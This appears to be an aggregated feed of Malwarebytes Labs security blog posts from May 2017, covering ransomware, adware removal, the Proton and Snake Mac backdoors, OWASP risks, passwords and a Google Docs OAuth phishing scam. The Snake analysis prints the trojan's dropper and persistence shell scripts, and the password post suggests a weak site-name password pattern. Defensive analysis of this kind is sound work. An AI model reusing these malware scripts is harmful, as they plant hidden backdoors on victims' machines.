Techie Feeds

WanaCrypt0r ransomware hits it big just before the weekend

Malwarebytes - Fri, 05/12/2017 - 18:07

Reports of two massive, global ransomware attacks are dominating the news. As workers in Europe are heading home for the weekend, ransomware is shutting down their systems. Here’s what we know so far.

Big targets

National Health Service (NHS) England, and Telefonica, one of the largest telecom providers in the world, have each given out statements indicating that their systems have been brought to a grinding halt by a ransomware that Malwarebytes detects as Ransom.WanaCrypt0r. The ransomware has also been observed hitting companies in Spain, Russia, Ukraine, and Taiwan.


The ransomware is spread using a known, and patched, vulnerability (MS17-010) that came from a leaked NSA set of exploits that we reported on our blog in April. Our research shows the encryption is done with RSA-2048 encryption. That means that decryption will be next to impossible, unless the coders have made a mistake that we haven’t found yet.

The demanded ransom of $300 and the potential risks to the public that come with the targets being big utility and healthcare companies seem to be in shrill contrast. We can only hope that the companies that were hit will be able to get their backups deployed quickly and can start the recovery from this cyberattack. 


Consumers and businesses alike should be sure their systems and software are updated with all current patches in order to stop the spread of infection. Both our consumer product, Malwarebytes, and our business product, Malwarebytes Endpoint Security, protect against this threat, since we detect this ransomware. And our anti-ransomware technology will stop any future unknown variants.

More to come

We’ll continue to update this post as news develops. We’ll provide additional technical analysis throughout the day.

The post WanaCrypt0r ransomware hits it big just before the weekend appeared first on Malwarebytes Labs.

Categories: Techie Feeds

New ‘Jaff’ ransomware via Necurs asks for 2 BTC

Malwarebytes - Thu, 05/11/2017 - 17:11

There is yet another ransomware on the block, but contrary to the many copycats out there this one appears to be more serious and widespread since it is part of the Necurs spam campaigns.

Originally identified by security researcher S!Ri, the Jaff ransomware looks very identical to Locky in many ways: same distribution via the Necurs botnet, same PDF that opens up a Word document with a macro, and also similar payment page.

However, this is where the comparison ends, since the code base is different as well as the ransom itself. Jaff asks for an astounding 2 BTC, which is about $3,700 at the time of writing.

Malwarebytes users are already protected against this ransomware thanks to our multi-layer defense. In the diagram below we show how the threat can be blocked via each of our protection modules (in a typical scenario, the threat would be stopped at the first layer which is the Application Behavior Protection):

In the meantime, the return of Locky after a short hiatus has not been as big as anticipated. The appearance of the Jaff ransomware may also take away some market shares from it.

The post New ‘Jaff’ ransomware via Necurs asks for 2 BTC appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Adware the series, part 3

Malwarebytes - Wed, 05/10/2017 - 15:00

In this series of posts, we will be using the flowchart below to follow the process of determining which adware we are dealing with. Our objective is to give you an idea of how many different types of adware are around for Windows systems. Though most are classified as PUPs, you will also see the occasional Trojan or rootkit, especially for the types that are more difficult to detect and remove.

Getting rid of files

In this post, we will discuss several methods to remove the files responsible for showing you the offending advertisements in those cases where the identified process is not a browser.


With many PUPs and sometimes even more intrusive adware, uninstalling the program that is showing you the advertisements will be enough. If this works it’s often the cleanest and easiest method to get rid of the advertisements. Identifying which program to uninstall from your list of installed software and features is sometimes the hardest step in this process. Here are a few tips that might help you to do so:

  • Use your favorite search engine to look for the process name we found to be responsible for the advertisement window. Sometimes this will reveal the name of the software it belongs to and how it’s listed in your list of installed programs and features.
  • Sort the list of installed programs and features by date of install. Although this date can easily be spoofed, most software packages in this category won’t. Compare that date to the date when the advertisements first started appearing.

  • Warning: in cases where you used a bundler there might be several entries with the same date.
  • Use your favorite search engine to look for the entries in your list of installed programs and features that you don’t recognize or remember installing.

Once you have identified the entries you want to remove, select them by clicking on the line in the list, and click on Uninstall.

It may be necessary to reboot the system for the changes to take effect. If this solves the problem, great. If not, keep reading.

Delete the file

If the advertisements don’t stop after trying the user-friendly approach outlined earlier, your next step is to delete the file which is responsible for the advertisements. This is much less a clean solution as it might leave more clutter behind. There are several methods that can be used and I will try to list them according to stubbornness. But first, we need to find the file. Since we already used Process Explorer to identify the process, we will also use it to locate the file. Right-click on the selected process and choose Properties and look at the Image tab to see the full path to the file.

Make a note of the path as we will need that later on. Then close the properties window and right-click the selected process once more. This time use the Kill Process Tree option and confirm that you want to kill this process (and if applicable the ones under it). If the process respawns immediately or Process Explorer (running elevated) is unable to kill it, you will have to wait for other parts in this series. If the process dies you can proceed with the deletion methods below.

  • Easy: navigate to the file path you made a note of earlier, right-click the file and choose Delete.
  • If that doesn’t work, there is always FileASSASSIN, but you will have to be 100% sure about the file you are going to remove.
    • Download and install FileASSASSIN following the prompts.

Browse to the file you want to delete, check all the upper boxes as shown below and click Execute.

  • You will see a prompt telling you whether the deletion was successful or not.
  • If this method does not work, give the Use delete on Windows reboot functions of FileASSASSIN a try.
  • The last method we will discuss here involves rebooting your computer in Safe Mode with Command Prompt. Doing so will cause Windows to only run the bare necessities and lessen the chance of the user being unable to delete the file. In the Command prompt use this command structure: DEL /F /S /Q /A “{full path to the file, including the extension}”.
  • Sometimes deleting such a file can cause errors which can be avoided by replacing the file with another (legitimate) one. Again you will want to boot into Safe Mode with Command Prompt use this command structure COPY /V /Y “{full path to the legitimate file including the extension}” “{location of the file to be replaced}”

Note that the last part just is the destination folder, there is no need to specify the filename and extension again.

If all of the above do not work for you, you may have to wait for the post that deals with rootkits. See you later. And stay safe out there.

Index Part 1
  • Identify the process
  • Clear browser caches
  • Remove browser extensions
Part 2
  • Proxies
  • Winsock hijackers
  • DNS hijackers
Part 3
  • Type of software
  • Uninstall
  • Remove file
  • Replace file
 Up next, part 4
  • Scheduled tasks
  • Services



Pieter Arntz

The post Adware the series, part 3 appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (May 01 – May 07)

Malwarebytes - Mon, 05/08/2017 - 18:00

Last week, we reported about that fake Google Docs app in real time as it wrecks havoc among GMail users worldwide. We also pushed out part 2 of our series on adware. During World Password Day, we highlighted the fact that although using multiple passwords is good, this may be difficult if one cannot manage them efficiently.

As it’s spring in the Northern Hemisphere, we found it appropriate and timely to write up a spring cleaning post.

Lastly, we covered a fair amount of macOS malware, specifically OSX.Dok and Snake. Click those links to check out technical details for each.

OWASP top ten – Boring security that pays off

Below are notable news stories and security-related happenings:

  • Super Free Music Player Is The Latest Malware On Google Play. “Another day, another piece of malware lurking on Google Play, masquerading as a free and helpful app. This time it’s called ‘Super Free Music Player’ and is supposedly a ‘great song app for discovering and listening to trending music’, and contains ‘unlimited free songs from Soundcloud.'” (Source: Help Net Security)
  • Schools Among The Most Sought After Cyber Targets: ESET Report. “What makes these organizations such an inviting target is schools, both those of higher education and local school districts, hold in one place all the types of data prized by hackers, health care information, student and employee personally identifiable information (PII), research and even payment card data, according to a report by ESET researcher Lisa Myers.” (Source: SC Magazine)
  • UK Office Workers ‘Too Trusting’ Of Email Attachments. “More than half (58%) of office workers among 1000 employees surveyed at mid-to-large UK businesses admitted to often opening email attachments from unknown senders, leaving companies open to breaches from documents carrying malicious exploits hidden inside common file-types.” (Source: InfoSecurity Magazine)
  • Criminals Turning To Fraudulent Gift Cards. “Traditionally, gift cards have been a quick way to make stolen credit card numbers pay off quickly. They buy the gift cards online, in bulk, then use the gift cards at their leisure or resell them, without worrying that the credit card number has been canceled — until the charge backs started coming in from the credit card companies and merchants wised up.” (Source: CSO)
  • HideMyAss! Privilege Escalation Flaws Exposed. “A set of serious security flaws in the HideMyAss! proxy service which could place user security and privacy at risk have been publicly disclosed. Over the weekend, Security researcher Han Sahin said that multiple privilege escalation vulnerabilities exist in HideMyAss! Pro VPN for Apple’s OS X operating system, a subscription-based virtual private network (VPN) service used to mask user traffic and online activities.” (Source: ZDNet)
  • 7 Steps To Fight Ransomware. “As ransomware perpetrators continue to hone their skills, we’re seeing a shift to more specific targets. The driver of this shift is the realization that companies, especially larger ones, are much higher-value targets than an average individual and are thus able to pay significantly higher ransoms. This change has elevated the need for companies to strengthen their defensive strategies. Executives must allocate resources and ensure strategies are active against ransomware intent on paralyzing their organization.” (Source: Dark Reading)
  • Fraudsters Draining Accounts With ‘SIM Swaps’ – What To Do. “A new phone can take over your old number because the number is actually tied to your SIM card – in fact, SIM is short for subscriber identity module, a special system-on-a-chip card that securely stores the cryptographic secret that identifies your phone number to the network. You may also need to get a new SIM from your mobile provider if you switch to a phone that requires a differently sized SIM card to the one in your current device.” (Source: Sophos’s Naked Security Blog)
  • Thieves Drain 2fa-protected Bank Accounts By Abusing SS7 Routing Protocol. “The unidentified attackers exploited weaknesses in Signalling System No. 7, a telephony signaling language that more than 800 telecommunications companies around the world use to ensure their networks interoperate. SS7, as the protocol is known, makes it possible for a person in one country to send text messages to someone in another country. It also allows phone calls to go uninterrupted when the caller is traveling on a train.” (Source: Ars Technica)
  • iPhone Phishing Scam Crosses Over Physical Crime. “Last late April a friend of mine had his iPhone stolen in the streets—an unfortunately familiar occurrence in big, metropolitan areas in countries like Brazil. He managed to buy a new one but kept the same number for convenience. Nothing appeared to be out of the ordinary at first—until he realized the thief changed his Facebook password.” (Source: TrendLabs’s Security Intelligence Blog)
  • NYPD: Fraud Ring Recruited Mules Via Social Media. “New York City police are claiming victory after smashing a multi-million-dollar financial fraud ring which is alleged to have recruited participants via enticing social media ads. The authorities have indicted 39 people for their part in a sophisticated operation which resulted in a whopping $2.5m in fraud.” (Source: InfoSecurity Magazine)
  • Europe Pumps Out 50% More Cybercrime Attacks Than US. “Cybercrime attacks launched from Europe reached more than 50 million in the first quarter, double the volume coming out of the US, according to the ThreatMetrix Q1 Cybercrime Report released today. And within Europe, Italy, France, Germany, and the UK accounted for half of all attacks originating out of the region, with the UK and Germany contributing the lion’s share.” (Source: Dark Reading)

Safe surfing, everyone!


The Malwarebytes Labs Team

The post A week in security (May 01 – May 07) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

HandBrake hacked to drop new variant of Proton malware

Malwarebytes - Mon, 05/08/2017 - 17:04

Last year, the Transmission torrent app was hacked not just once, but twice, to install the KeRanger ransomware and, later, the Keydnap backdoor. Now, the same thing has happened to the popular DVD-ripping HandBrake app, which is installing a new variant of the Proton malware.

The real HandBrake 1.0.7 app was replaced with a malicious copy on May 2. This issue was discovered and the malicious app was removed on May 6, also a security warning was posted on the HandBrake website. Both the HandBrake website and the copy of HandBrake available via Homebrew (a command-line software installation system) were affected.

Am I infected?

The security warning provides SHA1 and SHA256 hashes for the malicious HandBrake-1.0.7.dmg file, recommending that you check this against the hash of your download before installing. To do this, enter the following command in the Terminal app (found in the Utilities folder in the Applications folder):

shasum /path/to/HandBrake-1.0.7.dmg

(Of course, be sure to insert the proper path to the .dmg file. Note that you can drag a file onto the Terminal window to insert its path into the command automatically.)

Compare the value returned by this command to the SHA1 hash. If it’s a match, throw that .dmg file in the trash, delete your copy of HandBrake, and scan your Mac with Malwarebytes for Mac. We detect this malware as OSX.Proton.

At this point, you can – in theory – safely download a new copy of HandBrake. I say “in theory” because we don’t know yet how the HandBrake site was hacked and what mitigations have been put in place to prevent future hacks.

If you download a new copy of HandBrake, you can check it against the checksums listed on the HandBrake site to verify that it is valid. However, there’s a big problem with this: If the website has been hacked to replace the legit copy of the software with a bad one, it’s reasonable to assume that the checksums there could be replaced with bad ones as well.

Unfortunately, HandBrake is not code signed, so there’s no real way to verify with 100% certainty that the copy you have has not been tampered with.

Malicious behavior

The malicious copy of HandBrake, when run, will immediately ask for an admin password.

This is not normal for HandBrake, which may tip off a veteran user of the software. However, for a new user, or someone installing an update who isn’t yet familiar with the behavior of that update, this may not raise any red flags.

If you are suspicious and click the Cancel button, it seems that the malware is not installed. Further, in my testing, there were no additional prompts in opening the app after the first. Still, I wouldn’t trust that copy of the app at all, even if it doesn’t appear to be dropping the payload under those conditions.

Unfortunately, checking for updates in the malicious copy does not result in any kind of a warning. When the same thing happened to the Transmission app, the Transmission Project quickly put out an update that would replace the infected app with a clean one, as well as cleaning up any traces of the infection on the system. Hopefully, the same will happen for HandBrake, but at the time of this writing that has not been done yet.

If the password is given, the malicious app will install the malware on the system in the following locations:

~/Library/LaunchAgents/fr.handbrake.activity_agent.plist ~/Library/RenderFiles/

The launch agent runs the activity_agent app at login and keeps it running in the event something terminates it.

However, it seems that this malware may be a bit buggy. On the first install, it also dropped a non-functional launch agent named fr.handbrake.activity_agent.plist-e with some of the contents missing. In another install, the launch agent contained the following non-functional plist data:

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" ""> <plist version="1.0"> <dict> <key>KeepAlive</key> <true/> <key>Label</key> <string>P_MBN</string> <key>ProgramArguments</key> <array> <string>P_UPTH</string> </array> <key>RunAtLoad</key> <true/> </dict> </plist>

It appears that the malware installs this .plist template, then uses the Unix sed command to search for and replace the P_MBN and P_UPTH values but fails to do some in some cases. Thus, the malware does not always successfully install.

The fact that the malware requests an admin password yet installs all components in user space where no admin password is needed was initially puzzling, but that password request is actually not a system-generated prompt. It’s a phishing dialog displayed by the malware to obtain your password, which will be sent in clear text to api[DOT]handbrake[DOT]biz, the command & control (C&C) server for this malware.

The malware will create some or all of the following files:

~/Library/VideoFrameworks/ ~/Library/VideoFrameworks/ ~/Library/VideoFrameworks/ ~/Library/VideoFrameworks/ ~/Library/VideoFrameworks/ ~/Library/VideoFrameworks/ ~/Library/VideoFrameworks/

These files contain a number of bits of data to be exfiltrated from the machine, such as browser data (including stored form auto-fill data), keychains, and even 1Password vaults. Since the user’s password was phished previously, that can be used to unlock the keychains, and either it or other passwords found in the keychain may be able to unlock other encrypted files. (Pro tip: never store the master password for your password manager in the keychain and make sure it’s a unique, strong password!)

The file is a master archive containing everything in the VideoFrameworks folder. It, too, will be sent to the C&C server, handbrake[DOT]biz, a domain that was just registered on April 29 of this year, presumably in preparation for this attack.

Interestingly, the only two Mac apps ever to be hacked in this manner—Transmission, and now HandBrake—were both originally developed by Eric Petit. Though I don’t know if it means anything at all, it’s certainly a fair question to wonder who has access to both of these projects that could be abused in this manner.

What is Proton?

Many people may never have heard of Proton before. Earlier this year, a signature for Proton was silently added to Apple’s XProtect signatures, but nobody ever saw a copy. Later, Sixgill wrote up findings that revealed Proton was malware up for sale on the dark web.

Proton is a professionally-developed backdoor, which at the time was selling for around 40 BTC (bitcoins), an amount that is currently worth more than $63,000. At that price, unlimited installations were allowed. A single-use license cost around 2 BTC, or more than $3,000.

As an aside, I find it rather ironic that this variant of Proton appears to be a bit buggy, with some installs failing. Hopefully, Proton, Inc’s customers will have similar questions. A little discord among criminals wouldn’t be a bad thing.


This is a general-purpose backdoor with all the usual backdoor functionality. In addition, it appears this malware is exfiltrating the entire keychain, with all passwords. Thus, if you’re infected, the first priority should be changing all your online passwords. (After ensuring that your computer is free of infection, of course! Never change passwords on a device that may still be infected.)

You’ll also want to take any necessary precautions if you have sensitive data that may have been exfiltrated and business users should contact their IT departments if a company Mac is found to be infected.

Seems like this is increasingly becoming something Mac users have to worry about.


Thanks to Amit Serper for analysis that provided some clarifying details about the behavior.

The post HandBrake hacked to drop new variant of Proton malware appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Snake malware ported from Windows to Mac

Malwarebytes - Fri, 05/05/2017 - 14:00

Snake, also known as Turla and Uroburos, is backdoor malware that has been around and infecting Windows systems since at least 2008. It is thought to be Russian governmental malware and on Windows is highly-sophisticated. It was even seen infecting Linux systems in 2014. Now, it appears to have been ported to Mac.

Fox-IT International wrote about the discovery of a Mac version of Snake on Tuesday. It’s not known at this point how Snake is spread, although the fact that it imitates an Adobe Flash Player installer suggests a not-very-sophisticated method. (I mean, come on, there are other pieces of software out there! Why are the bad guys so hung up on Flash installers?)

Distribution method

The malware was found in a file named Install Adobe Flash The app inside the .zip file would appear to be a legit Adobe Flash Player installer. The app is signed, however, by a certificate issued to an “Addy Symonds” rather than Adobe, but the average user is never going to know that… as long as it’s signed, Apple’s Gatekeeper system will allow it, when set to its default settings.

If the app is opened, it will immediately ask for an admin user password, which is typical behavior for a real Flash installer. If such a password is provided, the behavior continues to be consistent with the real thing.

Proceeding through the installation to the end will display no suspicious behavior and in the end, Flash will actually be installed. This is a significant break from other fake Flash installers, which at best download the real Flash installer and open it separately after proceeding through a completely unconvincing fake install process.

It turns out that this is because the app incorporates a real Flash installer. The app has a rather strange internal structure, lacking the normal structure of an application bundle on macOS. It works, though.

When the app runs, a malicious executable named Install – also code-signed by Addy Symonds – runs first. That process, in turn, executes an included shell script named

#!/bin/sh SCRIPT_DIR=$(dirname "$0") TARGET_PATH=/Library/Scripts TARGET_PATH2=/Library/LaunchDaemons cp -f "${SCRIPT_DIR}/queue" "${TARGET_PATH}/queue" cp -f "${SCRIPT_DIR}/installdp" "${TARGET_PATH}/installdp" cp -f "${SCRIPT_DIR}/" "${TARGET_PATH}/" cp -f "${SCRIPT_DIR}/com.adobe.update" "$TARGET_PATH2/com.adobe.update.plist" "${TARGET_PATH}/" "${SCRIPT_DIR}/Install Adobe Flash Player" exit $RC

This script installs the following components of the malware:

/Library/Scripts/queue /Library/Scripts/installdp /Library/Scripts/ /Library/LaunchDaemons/com.adobe.update.plist

Next, the script opens the shell script then launches the real Install Adobe Flash Player process, which performs the actual installation of Flash. By the time the Flash installer interface appears, the machine is already infected.

The script, which is also run by the installed launch daemon, simply checks to see if the malicious installdp process is running and if it isn’t, launches it.

#!/bin/bash SCRIPT_DIR=$(dirname "$0") FILE="${SCRIPT_DIR}/queue#1" PIDS=`ps cax | grep installdp | grep -o '^[ ]*[0-9]*'` if [ -z "$PIDS" ]; then ${SCRIPT_DIR}/installdp ${FILE} n fi exit $RC

At this point, once installdp is running, the malware is fully functional, providing a backdoor into the Mac, configured according to the data found in the queue file.


In all, this is one of the sneakier bits of Mac malware lately. Although it’s still “just a Trojan,” it’s a quite convincing one if distributed properly. Although Mac users tend to scoff at Trojans, believing them to be easy to avoid, this is not always the case.

Trojans can be effective even when they’re junk and the social engineering behind them is poor. Consider how bad it would be if someone were to receive this file in a convincing spoofed e-mail, supposedly from their IT department or a close friend, telling them to install it immediately due to a recent Flash vulnerability! As a spear phishing attack, this could be used with devastating effect.

Further, the installed components of the malware are quite effective as well. Few people even know that the /Library/Scripts/ folder exists, so that’s a moderately safe place to dump a payload (although there are better options). The launch daemon is quite unremarkable since anyone with Adobe software will have other Adobe launch agents or daemons installed. The average person won’t know this one isn’t legitimate.

Fortunately, Apple revoked the certificate very quickly, so this particular installer is no further danger unless the user is tricked into downloading it via a method that doesn’t mark it with a quarantine flag (such as via most torrent apps). Malwarebytes for Mac will detect it as OSX.Snake and removal, in this case, is a breeze.

If you’re infected, however, as with any backdoor, it’s important to keep in mind that data may have been stolen, including passwords and any unencrypted files on the hard drive. Keep in mind that, even if you use File Vault, the files are decrypted as long as you’re logged in, so this doesn’t really count.

After removing the malware (and restarting the computer), change your passwords and make sure that you’ve taken any other necessary steps to mitigate damage due to the possibility of exfiltrated data. And, as always, if this is a business machine, contact IT so they know about the issue and can take any necessary measures to mitigate risk to the company.

The post Snake malware ported from Windows to Mac appeared first on Malwarebytes Labs.

Categories: Techie Feeds

OWASP Top Ten – Boring security that pays off

Malwarebytes - Thu, 05/04/2017 - 16:00

There’s a lot of very unique, creative, and devastating cyber threats out there. The first inclination of a defender is to collect news of the new and terrifying and concentrate on network security defenses accordingly. This is completely understandable and mostly wrong. The majority of actual attacks, rather than proofs of concept, use simple and common vulnerabilities that in some cases are decades old. As an example, Facebook and Google recently fell victim to business email compromise. We’ve discussed on the blog previously that this is not much more complicated than standing on a street corner and politely (or impolitely, depending on the company you’re spoofing) asking for money.

OWASP is a group of security professionals who aggregate and publish this second type of vulnerabilities – boring, but very common and very commonly exploited. They recently published a draft list of the top 10 security vulnerabilities of 2017. While intended for developers seeking to code more secure applications, the top 10 list is based on actual survey data of threats seen in the wild and serves as a great starting point for organizations struggling with security priorities. Let’s take a look and see how long they’ve been around prior to publication.

OWASP Beta 2017 Top 10


Injection flaws, such as SQL, OS, XXE, and LDAP injection occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization. SQL injection was first seen possibly as early as 1998. Detailed info on mitigations can be found here.

Broken authentication and session management

Application functions related to authentication and session management are often implemented incorrectly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users’ identities (temporarily or permanently). The earliest online reference I could find to a Man in the Middle attack was 2001, but given that cookies were first introduced in 1994, the attack almost certainly has a longer history in the wild.

Cross-site scripting

XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user supplied data using a browser API that can create JavaScript. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites. XSS was first discussed by Microsoft engineers in 2001. Mitigations generally include adhering to coding best practices and a robust testing program prior to release.

Broken access control

Restrictions on what authenticated users are allowed to do are not properly enforced. Attackers can exploit these flaws to access unauthorized functionality and/or data, such as access other users’ accounts, view sensitive files, modify other users’ data, change access rights, etc. This is a vulnerability that predates computers, and will still be seen after the singularity. The easiest patch is to use a robust threat model to determine the least necessary privileges for each user.

Security misconfiguration

Good security requires having a secure configuration defined and deployed for the application, frameworks, application server, web server, database server, platform, etc. Secure settings should be defined, implemented, and maintained, as defaults are often insecure. Additionally, software should be kept up to date. Again, misconfiguration of security measures predates their application to computers. An auditing and red team program with teeth can assist in programs being appropriately configured before they hit a production network.

Sensitive data exposure

Many web applications and APIs do not properly protect sensitive data, such as financial, healthcare, and PII. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data deserves extra protection such as encryption at rest or in transit, as well as special precautions when exchanged with the browser. APT groups have made sensational use of this vulnerability, but so have amateurs working from public data. Including social engineering in red team tests and having defined legal policies in place covering disclosure of company data can diminish exposure.

Insufficient attack protection

The majority of applications and APIs lack the basic ability to detect, prevent, and respond to both manual and automated attacks. Attack protection goes far beyond basic input validation and involves automatically detecting, logging, responding, and even blocking exploit attempts. Application owners also need to be able to deploy patches quickly to protect against attacks. This is a catch-all covering security programs and applications that are ill-conceived, underfunded, or non-existent. Failing here is largely a policy problem.

Cross-site request forgery (CSRF)

A CSRF attack forces a logged-on victim’s browser to send a forged HTTP request, including the victim’s session cookie and any other automatically included authentication information, to a vulnerable web application. Such an attack allows the attacker to force a victim’s browser to generate requests the vulnerable application thinks are legitimate requests from the victim. CSRF has been seen referenced as far back as 2001. Like XSS, it can be mitigated by adherence to best practices, in conjunction with security testing.

Using components with known vulnerabilities

Components, such as libraries, frameworks, and other software modules, run with the same privileges as the application. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications and APIs using components with known vulnerabilities may undermine application defenses and enable various attacks and impacts. Continuing to use any sort of code with known vulnerabilities is an issue seen almost everywhere, up to and including the US government. This is a very old issue and must generally be patched on the wetware side of the network.

Underprotected APIs

Modern applications often involve rich client applications and APIs, such as JavaScript in the browser and mobile apps, that connect to an API of some kind (SOAP/XML, REST/JSON, RPC, GWT, etc.). These APIs are often unprotected and contain numerous vulnerabilities. Testing 3rd party APIs can be difficult, but not impossible. One approach would be to determine the technologies underpinning the API with a site like, and then run pen tests against those technologies.

As you can see, most of these are relatively old and not all require a great deal of difficulty to exploit. What they require is time and attention, along with mature security policies ensuring organizational components work together towards a fix. Unlike arcane APT toolkits, the above vulnerabilities are used indiscriminately. Studies have found up to 65% of observed companies demonstrate exposure to SQL injection, for example. Starting with the old, boring, and extremely effective threats can bring some immediate results to defenders. For more on the top 10, and info on the finalized list when it’s released, check out


William Tsing

The post OWASP Top Ten – Boring security that pays off appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Why you don’t need 27 different passwords

Malwarebytes - Thu, 05/04/2017 - 14:00

Passwords. The bane of modern existence. To celebrate this nuisance, the holiday gods have given us World Password Day, where thousands of people come together online and pledge to improve their password habits. How many of those pledges do you think stick? According to the 2017 Verizon Data Breach Investigation Report, not many. A little over 50 percent of all breaches in the last year leveraged either stolen or weak passwords.

Coincidentally, today is also Star Wars Day (May the 4th Be with You). And while we all wouldn’t mind having a lovable droid guard our passwords as loyally as R2D2 guarded the blueprints for the Death Star, the reality is we’ve got to do the guarding ourselves. And that has become burdensome enough to send Yoda himself over to the Dark Side.

Current state of affairs

According to a poll by Intel Security, the average person has 27 discrete online logins. From social media accounts to banking to online shopping to utilities, credentials—which usually include a username and password—are required for each. And if people are practicing good password hygiene, they’re engaging in the following recommended practices:

  • DO: Use a different password for each account.
  • DO: Use a long password. In fact, the longer, the better.
  • DO: Use special characters, numbers, and capital letters.
  • DO: Change your passwords every couple of months.
  • DO NOT: Write down your password, whether that’s on a piece of paper or stored electronically.
  • DO NOT: Share passwords via text, email, or chat.
  • DO NOT: Use easily identifiable information, such as a birthday or a child’s name.
  • DO NOT: Use an incredibly generic password such as 12345. (That’s the combination an idiot would use on his luggage.)

All of this, for 27 different logins, is simply unmanageable. In fact, the Intel study found that 37 percent of its respondents forgot a password at least once a week. And people are so sick of juggling dozens of different passwords, that 20 percent said they would give up ESPN if it meant never having to remember another one. Six percent said they’d give up pizza. PIZZA.

This level of discontent and security fatigue means that very likely, most users are falling back on bad habits: writing passwords down in a notebook or a Google sheet, for example, or using the same password across multiple logins. (A study by the National Institute of Standards and Technology confirms this: 91 percent of its respondents admitted to reusing passwords.)

So this is why we say: stop it. Stop the bad habits, yes, but stop the “good” ones, too. Having 27 different passwords that are lengthy and full of characters and numbers and need to be changed every few months and can’t be written down—you’d need the memory of an eidetic elephant to keep up. Online services will only multiply, so what should you do?

It’s very simple. Get a password manager.

Password manager 101

For those who might not be familiar, password managers assist in generating, storing, and retrieving passwords from an encrypted database. They typically require that users create and remember one master password to rule them all. One master password to find them. One master password to bring them all, and in the darkness bind them.

One master password to stand at the precipice and shout gallantly, “YOU SHALL NOT PASS!”

Sorry, it couldn’t be helped. As we were saying. Generally, most password managers work the same way. You’ll be asked to create a strong master password during setup (and here’s where you’ll use those password best practices, such as generating a long passphrase with numbers and capitals that steers away from guessable personal info). From there, you’ll add your other credentials to the password manager either manually or through tools that can automatically find and upload passwords for you.

While most password managers have similar setups, they secure passwords in different ways. Web-based password managers store your passwords encrypted in the cloud. Some are built into browsers, such as Safari, Firefox, and Chrome. Others may store your passwords locally in an encrypted file on your computer, tablet, or phone.

In addition, some password managers have features that help you audit your credentials, allowing you to weed out duplicate login info and remove sites you don’t use, or alerting you to breaches that have happened to the companies you log into. Many have customizations that allow increased security, such as regional lockout and two-factor authentication (which we highly recommend taking advantage of).

But aren’t I just asking to be hacked by storing everything in one place?

While some folks might be wary of using a single point of access for all their sites, remember that password managers still use your individual passwords to log in to your accounts. Those passwords are locked in an encrypted database, which is way more secure than a post-it on your office desk or a faulty memory. Ask yourself this: is it safer to store all your money in one bank or to hide it in piles underneath several mattresses?

As for fear of password managers being breached—sure, it’s possible. In fact, it’s already happened, as was the case in 2015 when LastPass was breached. However, even though cybercriminals got their hands on some email addresses, they were unable to crack master passwords. This is because master passwords are protected with military-grade security, hidden behind thousands of rounds of hashing, or algorithms that convert strings of text into longer strings of text. So far, no reputable password manager has leaked consumer master passwords (that we know of).

So which password manager should I use?

The following password managers come highly recommended by our staff and tech reviewers from The New York Times, Lifehacker, and PCMag:

If you don’t trust third-party apps with all of your personal information, you can try an open-source password manager such as KeePassX, though it requires a fair bit of technical know-how to set up.

I am absolutely opposed to a password manager. What else can I do?

While we stand by our recommendation to use password managers, we understand the urge to reject placing all your trust in the hands of another company. So here are a few alternate methods for choosing more secure passwords than the random hodgepodge you’re likely working with now.

  1. Split up your online services into major groups, such as bills, entertainment, shopping, and social media. Assign a single password to each group according to a theme. For example, you could choose movies as your theme and assign quotes from one movie to one group, or character names from a second movie to the second group. Rotate these passwords every 90 days by incrementally adding a number or changing a character. This requires a lot more effort but is still preferable to using the same password across all accounts or having to reset forgotten passwords every week.
  2. Choose one semi-difficult password for all accounts but insert a naming convention in the middle of the password to denote which account you are signing into. For example, if your password is L3tme1npleaz, your Gmail password could be L3tme1nGMAILpleaz. Your Amazon password could be L3tme1nAMAZONpleaz, and so on and so forth.
  3. When possible, choose a service that has two-factor authentication over one that does not. More than 150 applications currently implement two-factor authentication. You can check them out here.

Passwords don’t have to rule your life. You can lock them up behind a password manager and worry about remembering a single, slightly complex phrase instead of 27. You can relax knowing how well guarded your passwords are. And you can go ahead and burn that secret list of passwords you keep in your address book even though you’re not supposed to.

Do you have a favorite password manager? Or a method for creating and remembering unique passwords? Let us know in the comments below.

The post Why you don’t need 27 different passwords appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Google Docs App spam goes phishing

Malwarebytes - Wed, 05/03/2017 - 19:51

There’s a very clever phishing scam going around at the moment – originally thought to be targeting journalists given the sheer number of them mentioning it on their Twitter feeds, it’s also been slinging its way across unrelated mailboxes – from orgs to schools/campuses. This doesn’t mean it didn’t begin with a popped journo mailbox and spread its way out from there or that someone didn’t intentionally send it to a number of journalists of course – but either way, this one has gone viral and not in a “look at the cute cat pic” fashion.

Here’s how it happens

The potential victim receives an email claiming to be from a Mailnator account, which they dispute is related to their service.

The email reads as follows:

Title: [Contact] has shared a document on Google Docs with you

Body: [Contact] has invited you to view the following document

Hitting the Google-styled “Open in Docs” button takes the clicker to a genuine Google sign-in page, which is sure to wrong-foot many people:

Where this all goes wrong is on the next page, which is where the victim actually gives the app permission to access the account via OAuth. Somehow, nobody at Google thought of preventing people from calling their apps “Google Docs”.

Google Docs would like to

Read, send, delete and manage your email

Manage your contacts

After “Allow” is hit, the spam is then sent on to contacts. While 2FA would normally save you from a phishing attempt, in this case, the victim is willingly giving permission to the app so 2FA won’t help – the only solution is to see which apps have been granted permission and revoke.

Here are some of the domains being used for this (all offline at the time of writing, but there may be others):

Phish domains:

— Andre M. DiMino (@sempersecurus) May 3, 2017

Google is aware of the situation and is currently working on it. Meanwhile, Cloudflare leapt into action very quickly. We’ll update the post with more information as it comes in.

Christopher Boyd (Thanks to DioDesign and hrbrmstr for screens/data)

The post Google Docs App spam goes phishing appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Adware the series, part 2

